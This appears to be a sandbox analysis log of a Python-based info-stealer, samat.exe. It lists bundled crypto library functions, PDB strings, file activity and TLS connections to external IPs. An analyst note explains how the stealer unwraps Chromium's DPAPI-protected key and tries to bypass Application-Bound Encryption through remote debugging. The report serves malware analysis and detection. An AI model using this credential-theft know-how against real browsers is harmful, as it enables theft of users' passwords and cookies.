Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBEE70 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptBinaryToStringW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptBinaryToStringW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W_J@Z,free,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EBEE70
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5A60 PyArg_ParseTupleAndKeywords,malloc,PyExc_MemoryError,PyErr_Format,memset,memcpy,CryptGenRandom,PyBytes_FromStringAndSize,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free, 8_2_00007FF8B7EB5A60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5E40 PyArg_ParseTupleAndKeywords,CryptExportPublicKeyInfo,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,CryptExportPublicKeyInfo,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free, 8_2_00007FF8B7EB5E40
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB3E30 PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,CryptHashSessionKey,_Py_NoneStruct,_Py_NoneStruct,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EB3E30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB2E30 PyExc_ValueError,PyErr_SetString,PyArg_ParseTupleAndKeywords,PyEval_SaveThread,CryptAcquireCertificatePrivateKey,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,CryptContextAddRef,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NewReference,Py_BuildValue, 8_2_00007FF8B7EB2E30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBA230 PyArg_ParseTupleAndKeywords,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptSetProviderExW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,_Py_NoneStruct,_Py_NoneStruct,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z, 8_2_00007FF8B7EBA230
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBBE2C _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptDecodeMessage,PyEval_RestoreThread,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ,free,CertCloseStore,free,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,Py_BuildValue,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptDecodeMessage,PyEval_RestoreThread,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyBytes_FromStringAndSize,Py_BuildValue,free,CertFreeCertificateContext,CertFreeCertificateContext, 8_2_00007FF8B7EBBE2C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB49F0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,CryptEncrypt,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyErr_NoMemory,CryptEncrypt,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,free,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EB49F0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBC5F0 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptDecryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptDecryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyBytes_FromStringAndSize,Py_BuildValue,free,??1PyWinBufferView@@QEAA@XZ,CertCloseStore,free, 8_2_00007FF8B7EBC5F0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB51E0 PyArg_ParseTupleAndKeywords,CryptReleaseContext,_Py_NoneStruct,_Py_NoneStruct,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EB51E0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBD9C0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyLong_AsVoidPtr,PyErr_Occurred,PyErr_Clear,PyBytes_AsString,PyExc_ValueError,PyErr_Format,_Py_NoneStruct,PyExc_NotImplementedError,PyErr_SetString,strcmp,malloc,PyExc_MemoryError,PyErr_Format,strcmp,PyExc_NotImplementedError,PyErr_Format,PyErr_Format,malloc,PyEval_SaveThread,CryptEncodeObjectEx,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,strcmp,free,LocalFree, 8_2_00007FF8B7EBD9C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBD5C0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptDecryptAndVerifyMessageSignature,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptDecryptAndVerifyMessageSignature,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyBytes_FromStringAndSize,Py_BuildValue,free,??1PyWinBufferView@@QEAA@XZ,free,CertCloseStore,free, 8_2_00007FF8B7EBD5C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB45B0 PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,CryptExportKey,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,CryptExportKey,PyBytes_FromStringAndSize,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free, 8_2_00007FF8B7EB45B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB4180 PyArg_ParseTupleAndKeywords,CryptGetHashParam,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,CryptGetHashParam,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyExc_NotImplementedError,PyErr_Format,PyBytes_FromStringAndSize,PyLong_FromUnsignedLong,free, 8_2_00007FF8B7EB4180
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBB180 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptGetKeyIdentifierProperty,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyExc_NotImplementedError,PyErr_SetString,LocalFree,??1PyWinBufferView@@QEAA@XZ,PyMem_Free, 8_2_00007FF8B7EBB180
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB596C PyArg_ParseTupleAndKeywords,CryptGetUserKey,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EB596C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB4560 CryptDestroyKey,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct, 8_2_00007FF8B7EB4560
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB3D30 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,CryptHashData,_Py_NoneStruct,_Py_NoneStruct,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EB3D30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBB520 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,?init@PyWinBufferView@@QEAA_NPEAU_object@@_N1@Z,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyList_New,PyEval_SaveThread,CryptEnumKeyIdentifierProperties,PyEval_RestoreThread,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ,PyMem_Free, 8_2_00007FF8B7EBB520
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5110 CryptReleaseContext, 8_2_00007FF8B7EB5110
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBD100 PyArg_ParseTupleAndKeywords,PyEval_SaveThread,CryptSignMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptSignMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,CertFreeCertificateContext,free,free,free,free, 8_2_00007FF8B7EBD100
Note: the 8_2_00007FF8B7EB... functions above are the pywin32 win32crypt extension (PyWinBufferView, PyWin_SetAPIError and the PyWinObject_* helpers are pywintypes symbols), and the 8_2_00007FF8B83... functions that follow are OpenSSL 3 libcrypto/libssl as shipped with CPython's _ssl module. Both are bundled into samat.exe by PyInstaller, so most of this listing is an inventory of library exports rather than code the malware author wrote, and the "Uses Microsoft's Enhanced Cryptographic Provider" and "Detected potential crypto function" signatures should be read in that light. The call that does matter for the stealer behaviour is CryptUnprotectData in 8_2_00007FF8B7EB9710: it is the DPAPI primitive a Python stealer uses to unwrap the encrypted master key in a Chromium browser's Local State. Since Chrome 127, cookies (and later passwords) are protected by Application-Bound Encryption, whose key is additionally wrapped in the SYSTEM DPAPI context through Chrome's elevation service, so a user-context CryptUnprotectData call on Local State is no longer sufficient on its own; that is why the same run also triggers "Attempt to bypass Chrome Application-Bound Encryption" and "Sigma detected: Browser Started with Remote Debugging", the latter being the route that reads secrets out through the browser's own DevTools interface instead of decrypting its files.
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B834CD30 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free, 8_2_00007FF8B834CD30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8381970 ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free, 8_2_00007FF8B8381970
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B83AB900 BN_bin2bn,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 8_2_00007FF8B83AB900
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B833F910 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free, 8_2_00007FF8B833F910
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8331E6A ERR_new,ERR_set_debug,CRYPTO_clear_free, 8_2_00007FF8B8331E6A
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8331A41 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 8_2_00007FF8B8331A41
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B833105F ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free, 8_2_00007FF8B833105F
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B837D980 RAND_bytes_ex,CRYPTO_malloc,memset, 8_2_00007FF8B837D980
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B83311DB EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free, 8_2_00007FF8B83311DB
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8393A60 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free, 8_2_00007FF8B8393A60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8347A60 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_malloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,strncmp,CRYPTO_free,CRYPTO_free,OPENSSL_sk_new_null,CRYPTO_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,OPENSSL_sk_free, 8_2_00007FF8B8347A60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8379A60 ERR_new,ERR_set_debug,EVP_MD_CTX_get0_md,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_MD_CTX_get0_md,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free, 8_2_00007FF8B8379A60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8373A00 CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free, 8_2_00007FF8B8373A00
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8331A15 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 8_2_00007FF8B8331A15
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B839BA20 CRYPTO_free,CRYPTO_free,CRYPTO_free, 8_2_00007FF8B839BA20
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt Jump to behavior
Source: unknown HTTPS traffic detected: 188.165.52.14:443 -> 192.168.2.5:49824 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50152 version: TLS 1.2
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4574676544.00007FF8B8327000.00000002.00000001.01000000.0000001E.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: samat.exe, 00000008.00000002.4568570169.00007FF8A882A000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: samat.exe, 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmp
Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\pywintypes.pdb** source: samat.exe, 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586592016.00007FF8BA504000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: 
sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: samat.exe, 00000007.00000003.2987011870.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4588139749.00007FF8BFB14000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: samat.exe, 00000008.00000002.4568570169.00007FF8A8792000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: samat.exe, 00000007.00000003.2987011870.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4588139749.00007FF8BFB14000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: samat.exe, 00000008.00000002.4568570169.00007FF8A882A000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\win32crypt.pdb!! source: samat.exe, 00000008.00000002.4572761166.00007FF8B7EC2000.00000002.00000001.01000000.00000031.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: samat.exe, 00000007.00000003.2987209081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586255750.00007FF8BA4F5000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585287094.00007FF8B9843000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: samat.exe, 00000008.00000002.4587381995.00007FF8BFAC3000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\pywintypes.pdb source: samat.exe, 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585606922.00007FF8B9F66000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584509371.00007FF8B919B000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: samat.exe, 00000008.00000002.4583959875.00007FF8B9162000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585930207.00007FF8B9F73000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\win32crypt.pdb source: samat.exe, 00000008.00000002.4572761166.00007FF8B7EC2000.00000002.00000001.01000000.00000031.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584509371.00007FF8B919B000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586952230.00007FF8BA51D000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586592016.00007FF8BA504000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584962997.00007FF8B93C9000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: samat.exe, 00000008.00000002.4582141897.00007FF8B90FF000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: samat.exe, 00000008.00000002.4569745344.00007FF8A8CF8000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: samat.exe, 00000007.00000003.2987209081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586255750.00007FF8BA4F5000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdb source: samat.exe, 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: samat.exe, 00000008.00000002.4582488584.00007FF8B911E000.00000002.00000001.01000000.00000018.sdmp
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12C9280 FindFirstFileExW,FindClose, 7_2_00007FF7E12C9280
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12C83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 7_2_00007FF7E12C83C0
